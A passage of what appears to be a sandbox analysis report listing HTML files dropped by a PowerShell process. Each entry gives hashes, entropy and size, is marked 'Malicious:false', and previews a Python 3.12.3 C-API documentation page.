                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Coroutine Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/coro.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Coroutine objects are what functions declared with an async keyword return." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Coroutine objects are what functions declared with an async keyword return." />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name=
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1557), with CRLF line terminators
                              Category:dropped
                              Size (bytes):67978
                              Entropy (8bit):4.885894045404287
                              Encrypted:false
                              SSDEEP:1536:LqyPMhKe4HeCbe3WeMgeQdeVZemIemueKJDeSJeCJjE2eCJjuYeCJjkVeCJjI8eK:DTg
                              MD5:B48FFF08046E2D30891A4210D31DFC5C
                              SHA1:5F7CD87A522AD7AC7EEEA65391DA4E7D74FAB510
                              SHA-256:1AD6F567798E87E6E2E6C2CE48E69014BC940DBBB508B521CEE3F39AE7B80F3A
                              SHA-512:6646EDDAB16CCC84BC4B8E73268BA9B1A92D87A3D86625F05155041A439E1D655437CA0587C449E6F242DEC2F26FE7FCECA60DEFA3324A110926AB29D1CD5B11
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="DateTime Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/datetime.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Various date and time objects are supplied by the datetime module. Before using any of these functions, the header file datetime.h must be included in your source (note that this is not included by..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Various date and time objects are supplied by the datetime module
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1204), with CRLF line terminators
                              Category:dropped
                              Size (bytes):22641
                              Entropy (8bit):4.875868822676572
                              Encrypted:false
                              SSDEEP:384:uHqkl1BAnWTM2DUeEqVJHeIJe0pJ+OVJ9eIJe0bSSNJcNVJCeIJe0WJcGVJYeIJk:Cqy1i8MwUeLJHeIJe0pJ+EJ9eIJe0bST
                              MD5:B43CBB6A201C8AF0EC526DF0FE0AD8BC
                              SHA1:1CADDCAF1DACD838C166BD451235FA20A524EA8A
                              SHA-256:2024222B523271BD0DA07918791579B3788B37449C660EB1FAAE86E8BDE29F0B
                              SHA-512:F5199EDBAC7CD41845B7309626937046026AC438C2C3F431595CAAE44F8885044478E184704A84B814F237E8927350F1B6317BA27037652B435910D38D07A2A9
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Descriptor Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/descriptor.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content=".Descriptors. are objects that describe some attribute of an object. They are found in the dictionary of type objects." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content=".Descriptors. are objects that describe some attribute of an object. They are found in the dictionary of type objects." />..<meta prope
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1859), with CRLF line terminators
                              Category:dropped
                              Size (bytes):72321
                              Entropy (8bit):4.8170634575554105
                              Encrypted:false
                              SSDEEP:1536:qqywMQhez/eT1eCJsy6eCJs9JOeDJqeCJKTUeCJsLYeCJseJr2JzeCJsHOeCJseu:BNCWxg
                              MD5:ABFCD510A5957E738A8EC774ADA2E33E
                              SHA1:735549406A3622F195D657678DD1ED3742FF480F
                              SHA-256:8EF8773302AE46648026FDEAB109A5E40FDF6AC05DE7B52C1C553A72134D2116
                              SHA-512:EA214EE14A290972D50D92F514AC2ED06C01BE1CC048A009AFFCDCB6519EE587BBD5C6A4FBD79F25075B6865AF850E08C637A2C584F536FCF269F86075528937
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Dictionary Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/dict.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Dictionary Objects &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1576), with CRLF line terminators
                              Category:dropped
                              Size (bytes):213783
                              Entropy (8bit):4.819670679843809
                              Encrypted:false
                              SSDEEP:1536:OrVqy0MenKdeOaeUFbDe9teCJp69eCJq5ox3eCJeeCH7hwOFfeCJeeJBAWeoJQe+:VWcWwOkWeXtUUNezdtNAWu0GzZm3GYg
                              MD5:CE526A73BD478722DB418566C499F94E
                              SHA1:519D53C3E263019E16B8D32A403AD7E5E84586B8
                              SHA-256:1612FDF2700731DBC10AEE7B876221171594754161CAB66C3A193ADDB322E2FE
                              SHA-512:2E0C4A74514B5EEA799E4F84DDF5CB34FC62285BFD8E3015428F2A80301801FD1238470724B540C77B042A0AC20E60BC2BDD97ECF9FAB8548F6A6B41B65BFF78
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Exception Handling" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/exceptions.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions described in this chapter will let you handle and raise Python exceptions. It is important to understand some of the basics of Python exception handling. It works somewhat like the PO..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions described in this chapter will let you handle a
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2160), with CRLF line terminators
                              Category:dropped
                              Size (bytes):29104
                              Entropy (8bit):4.871777385163392
                              Encrypted:false
                              SSDEEP:768:6qylDQM/zJeeUNeCHJeCHNo5eCHjeCHJeCHco5/tTeCJs+aYJseCJsoZQ9leph7/:6qyqM/zJeeUNeCHJeCHNo5eCHjeCHJeP
                              MD5:00F8228B186364B5601B9C042AF0ECB5
                              SHA1:0A635C565238261E420F077D73D2C80B2922DD76
                              SHA-256:9A5A1EF829620B298B47FF3DE75058580B6F1FCF577857554C701B772C77DBDC
                              SHA-512:D3A2C832660B038AFA54FCBA15814D02531A7577492CF7FC4C60DD5036DB7CB03EBCB8396346BA6A8DE2C2F6CFA6D49DF4F1C694382CD9D27810E37AA92D3D41
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="File Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/file.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These APIs are a minimal emulation of the Python 2 C API for built-in file objects, which used to rely on the buffered I/O ( FILE*) support from the C standard library. In Python 3, files and strea..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These APIs are a minimal emulation of the Python 2 C API for built-in fil
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (848), with CRLF line terminators
                              Category:dropped
                              Size (bytes):37993
                              Entropy (8bit):4.887751833127853
                              Encrypted:false
                              SSDEEP:768:7qyMEkMUNexTe6peCJs1WeCJsTJheCJrTJxeQxHAeCJ7f0heCJ75jJuerM7eJPBn:7qySMUNexTe6peCJs1WeCJsTJheCJrTB
                              MD5:D371F31190459D34CB37234C1777C4E9
                              SHA1:00B5E1995846C3B71FF9402E8EB9634FDB289D43
                              SHA-256:89AF352BF421F0FCCB607747DE4885895091B6F251C75CC33794BFF22A206232
                              SHA-512:BCC7AD085F50BD357D5BA8911F8D2C11C92303260B1C2CC81B29C8D0FCB8A67EEAB86718E11FD2A119B48BFEB5F954DCC0A9726B6C376D1A842BF366A6DEEE80
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Floating Point Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/float.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Pack and Unpack functions: The pack and unpack functions provide an efficient platform-independent way to store floating-point values as byte strings. The Pack routines produce a bytes string from ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Pack and Unpack functions: The pack and unpack functions provi
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1010), with CRLF line terminators
                              Category:dropped
                              Size (bytes):36833
                              Entropy (8bit):4.888510774866766
                              Encrypted:false
                              SSDEEP:768:qqyZhhMRaeCSevieCJpZ8JueOJpoeJleOJpbWJoeOJp5CJweOJpgMJteOJpLgje6:qqyZMRaeCSevieCJpGJueOJpoeJleOJQ
                              MD5:6AA9B1097EEDCEC6D3D62A056627DA70
                              SHA1:3113ED64A2B9815CC44EF41CA4250FA9CDF42DBB
                              SHA-256:0BDB9292C76B2830C287FE79E23845C6B157A3DC48C66378AD502676663174F0
                              SHA-512:7D8F75345B4DBA6664856098537BEB5C6DB00A400D23E72EB1E0C62EEEFEDCEAE598295A0B0774411F83EC9DA9635C19497AC9904C146844CF092FBDE8958EA8
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Frame Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/frame.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The PyEval_GetFrame() and PyThreadState_GetFrame() functions can be used to get a frame object. See also Reflection. Internal Frames: Unless using PEP 523, you will not need this." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The PyEval_GetFrame() and PyThreadState_GetFrame() functions can be used to get a frame obje
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1550), with CRLF line terminators
                              Category:dropped
                              Size (bytes):41352
                              Entropy (8bit):4.886201978528639
                              Encrypted:false
                              SSDEEP:768:ZqymEMMYxexfeFFeCJl3JOeCJreJ0hJaeCJreJ0eJKeLJleCJ9HJ6eCJ9CJweCJo:Zqy+MYxexfeFFeCJl3JOeCJreJ0hJaen
                              MD5:E1D9D4EB16CAAD47A8E14CFA57CE26CB
                              SHA1:49EBD5F98E6ADF1E49C819818FD676C41E872E1E
                              SHA-256:E388561BBC1EA809B5988A6E596F7E40C7AA500AF3699DD30FE51E931BBEE0E8
                              SHA-512:73AC31557E0B5BA7D81A47B2D8FF436E1C8A1069F8EF517C9F45F0A7420488DB4BB22A92034EEEA53DCDECFEE45883A24185ABFA48BEBD50020053C622E73561
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Function Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/function.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are a few functions specific to Python functions." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are a few functions specific to Python functions." />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1387), with CRLF line terminators
                              Category:dropped
                              Size (bytes):54027
                              Entropy (8bit):4.921374655045684
                              Encrypted:false
                              SSDEEP:1536:eqyu32aMfgXeGtVeGtn6J1eIJeQpRTeGhnugieCJ9gReCJpcHneCJ9PuLeCJ9D5N:132f2P6RdszKNmpKMd23yg
                              MD5:F2B982F211EA79B09C1F4FB35B250060
                              SHA1:97E0714BD0DC03C72FC834B99990A940C20BCA4C
                              SHA-256:8945B6192A23B8007108D9E4592B028369548818BF05E4BB5B3856A9D1A9B532
                              SHA-512:466D5AC8A781456F7BB2ABC32EA08DC89D8DA7FD72060183AB960C1EF32F3B85841329B61B53B7F0DC98A2715ADFF8AFC7635D2FC38294792AEA4E651E011EBE
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Supporting Cyclic Garbage Collection" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/gcsupport.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python.s support for detecting and collecting garbage which involves circular references requires support from object types which are .containers. for other objects which may also be containers. Ty..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python.s support for detecting and c
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1305), with CRLF line terminators
                              Category:dropped
                              Size (bytes):19443
                              Entropy (8bit):4.887269112763904
                              Encrypted:false
                              SSDEEP:384:VQOHqklYR0hnsTMoVefDLeDheIVJjuOeIVJj6VJse+JpOVJge+JpEVJJEVJKwRZf:HqyYwCMoVerLeDheCJjuOeCJjQJse+J5
                              MD5:7B4208B7497C5414C02DA91293AD4DC2
                              SHA1:5D3B643E555E8C35835B47B0A04BFE55DB13C583
                              SHA-256:663AD78D1DAAE753E7C93E348DD86435BA901B285ECB2D81AF163BAF0CF955FF
                              SHA-512:FAAA04017C4701E5A6A3F86349EA6B8CA75DD215172D68770A6D13926CEE35825100A48B87B575E82E222BF42698574CEE01D02C43D2B7B8C090A5B8E7E4B871
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Generator Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/gen.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Generator objects are what Python uses to implement generator iterators. They are normally created by iterating over a function that yields values, rather than explicitly calling PyGen_New() or PyG..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Generator objects are what Python uses to implement generator iterato
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (536), with CRLF line terminators
                              Category:dropped
                              Size (bytes):17190
                              Entropy (8bit):4.883324490997966
                              Encrypted:false
                              SSDEEP:384:nHqklyEUnnTMLqegPpeoGEePCHHe/pUePpveVDJXerUZup8nDTMS76dqEC:HqyyNTMLqeupevEePCHHe/pUePpveJJr
                              MD5:4AE42ADEF8F2AF6FB296110969F586F9
                              SHA1:7459E1DC05EC49687EB35047CA84EA719E30BC36
                              SHA-256:2BDFAAB91AF2D0A51C46936D107DD30885176D6971E069BFC5A3CEFBC6982CFD
                              SHA-512:72825F93A41B253C97CC7F651890E083DDAB55C2A7B062888BBF99A9AA88131A3400B2815A9F5D4909FFDA4B81BA4DF9A3DFA30F6E5078B012834677D77C4752
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="PyHash API" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/hash.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="See also the PyTypeObject.tp_hash member." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="See also the PyTypeObject.tp_hash member." />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>PyHash API &#8212; Python
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1720), with CRLF line terminators
                              Category:dropped
                              Size (bytes):67467
                              Entropy (8bit):4.85299626927617
                              Encrypted:false
                              SSDEEP:1536:6qyVMoJ4eiCHJPh3JyeiCHJfJ5eiCHJeJ0eJWeJqiJzeCJJeJ0eJWeJqoV+JweiM:+o/Vg
                              MD5:0712766986B78D381D34B8021D93B7FE
                              SHA1:D7BB2D46C4A6BD851FC8D01B3459DAF3DE2DAEC7
                              SHA-256:CDC979588A09B5E96D8619B604A956BC84BB62A0216E341B273B31F0AFE6F7CD
                              SHA-512:C7A3E84331620C6CBE87669E8BFDF43F9A8811852F817DEA41A50FDD7D9ACAA2C4F970320897821CD144CB87E45CB50F685AFED9D0A10E47D1D321BFCADFB430
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Importing Modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/import.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Importing Modules &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):26042
                              Entropy (8bit):4.882844562211637
                              Encrypted:false
                              SSDEEP:384:4rcHqklhkOnVTM9R/lQIdgXt4+xH1JKnZTMe76dqEC:NqyhlRMn28NMe764N
                              MD5:01F9F6A10A3E316293E9EF2BE36B2977
                              SHA1:8274BA10F8C4013738B92B192F7CC92592D3B470
                              SHA-256:2194919538FAC4D36A0FE09D2A8F2C2A595AC7B97E00AD27AB0839DC0E77A16C
                              SHA-512:850F7E723C8557F60976A718E7887CD3BD2D94787B9AEE5A66AECD32BDCBFD324300EA672A3753E515D2C719BA6CF051E75A5BB71AD3BF9521AE8B76A6AB1FC1
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python/C API Reference Manual" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This manual documents the API used by C and C++ programmers who want to write extension modules or embed Python. It is a companion to Extending and Embedding the Python Interpreter, which describes..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This manual documents the API used by C and C++ program
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (882), with CRLF line terminators
                              Category:dropped
                              Size (bytes):279279
                              Entropy (8bit):4.890356416578371
                              Encrypted:false
                              SSDEEP:6144:sNDeuxn1qGCQ86XV0isJuokoM0+haHNb20+dBZ+Tb+95jml7g:dg
                              MD5:5335A2D0DD436B3A936BD02C622D5C9E
                              SHA1:5AA19F1E5613E77C7536F35D1A049A72CD6FAD6B
                              SHA-256:315CE2E5E6136DBF1BA4CD5C2A0F4663ED208D825EEF9BDE9D5F3516A99310DD
                              SHA-512:26FF7D1ABEC21EB691A5631EEF195A1834D8DCDD4EBAF712FEE142BE75FFDC8B876F66D889B30FD986D5687B32EA046A83DFD56FD5D6F848A5495CB56A2CB8F4
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Initialization, Finalization, and Threads" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/init.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="See also Python Initialization Configuration. Before Python Initialization: In an application embedding Python, the Py_Initialize() function must be called before using any other Python/C API funct..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="See also Python Initialization Configuration
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1218), with CRLF line terminators
                              Category:dropped
                              Size (bytes):228040
                              Entropy (8bit):4.84968154443352
                              Encrypted:false
                              SSDEEP:1536:FqyMMBkkeoheMJOe5HF6AeMJOrZe5HFzjeyHMie9weH4eECH/ewCHaeVver4TeiF:t2eIixtLRD5t5z14q92g
                              MD5:B352AFA08B6AAD5FA2A57A365A5F58BD
                              SHA1:55E6F710AAB95B5FB65C010A523FA9791DA1801D
                              SHA-256:39711E0FF96C99A885C2E30DFDFB24CED3C3B333164C0D33CA2EAA216459F185
                              SHA-512:9B21E1367D3DF27953A06EA33FE9D1872941DDAE6B081C1338DA74762838C8D005EED64C586790F83A437B1F87D5CCA117A91B84DFC4794684E766ED85372C27
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python Initialization Configuration" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/init_config.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python can be initialized with Py_InitializeFromConfig() and the PyConfig structure. It can be preinitialized with Py_PreInitialize() and the PyPreConfig structure. There are two kinds of configura..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python can be initialized with Py_Initializ
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (626), with CRLF line terminators
                              Category:dropped
                              Size (bytes):106771
                              Entropy (8bit):4.859201129994066
                              Encrypted:false
                              SSDEEP:1536:GGYqy1M+0hte+WnEecneDiep2e4fDeZaecjReGAuecjVenlecseTWeMweBXQcbep:GGW0/SB4Fl/qkXLzyWeggag
                              MD5:A7EAE0AF8AEED9287CD40553A9FCB0B4
                              SHA1:ECB2BF6B24A06BBB530FC9192E13C34E5D104919
                              SHA-256:1CC1227EC4DAA4C12D6D6783A0BD93479F2C65ECF6E22D4DF734D824F576665D
                              SHA-512:1A6943D815B4F5A5043CB92C51D8AD31DEAF13C4FBCE962E8A9DEFBFAB2AEA41DEDA61D5E3E25B24DD1BEAEC51FD0444A3DF21285BD61E868FAAB96CF9C4FBF0
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Introduction" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/intro.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The Application Programmer.s Interface to Python gives C and C++ programmers access to the Python interpreter at a variety of levels. The API is equally usable from C++, but for brevity it is gener..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The Application Programmer.s Interface to Python gives C and C++ pro
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1269), with CRLF line terminators
                              Category:dropped
                              Size (bytes):22462
                              Entropy (8bit):4.867850146969797
                              Encrypted:false
                              SSDEEP:384:6HqklZOgn2TMmreIVJlsieIVJlZcVJNeIVJlszkiBYhHFNelILeIVJMEVJkEVJMw:OqyZBcMmreCJlsieCJlwJNeCJlWbBYh/
                              MD5:E3C31E23767226555F438B0D0F105B87
                              SHA1:538FB61B5DA0671ECD91A181A4D9D630127972A7
                              SHA-256:A328EA7B34488C00ED1DBF7F326E3D4719CCD7CFEC7C89C8A04A0BC782A2DCCA
                              SHA-512:AD8B76CE307098B155B47517075F5AF06791F8BB6C1D81A84F521659109602EE5C174C522C06F0AB946BCB89238365BF0ABD2BCECC9922BC4ABC8B77FD8C4629
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Iterator Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/iter.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are two functions specifically for working with iterators. To write a loop which iterates over an iterator, the C code should look something like this:" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are two functions specifically for working with iterators. To write a loop which iterates over an iterato
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1016), with CRLF line terminators
                              Category:dropped
                              Size (bytes):20665
                              Entropy (8bit):4.891099591900654
                              Encrypted:false
                              SSDEEP:384:qYsHqkl5KonaTM8VD2exWeIVJ93VJreIVJrZ0DheI7eIVJ9OVJUeIVJyEVJatYoP:qYQqy5b4M8h2exWeCJ9lJreCJrZmheIe
                              MD5:1D73062207865B5516A43A0578D7D724
                              SHA1:61EDB1ED38B1DB40840EEE6B6A338FE317EFD5DA
                              SHA-256:5CB407E5E9E7548B280036951503FD7C7E556DEB153206A5866A2264AEBB478D
                              SHA-512:585E9522C74F59EEFFA0494AA68C82137272F6129454AD548D1491123F5E46D3DD3FCF52AE4A8B4806DE1EA1480F0D6E66CDFFC09D860E2A4AFD6852277B08DD
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Iterator Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/iterator.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python provides two general-purpose iterator objects. The first, a sequence iterator, works with an arbitrary sequence supporting the__getitem__() method. The second works with a callable object an..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python provides two general-purpose iterator objects. The first,
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
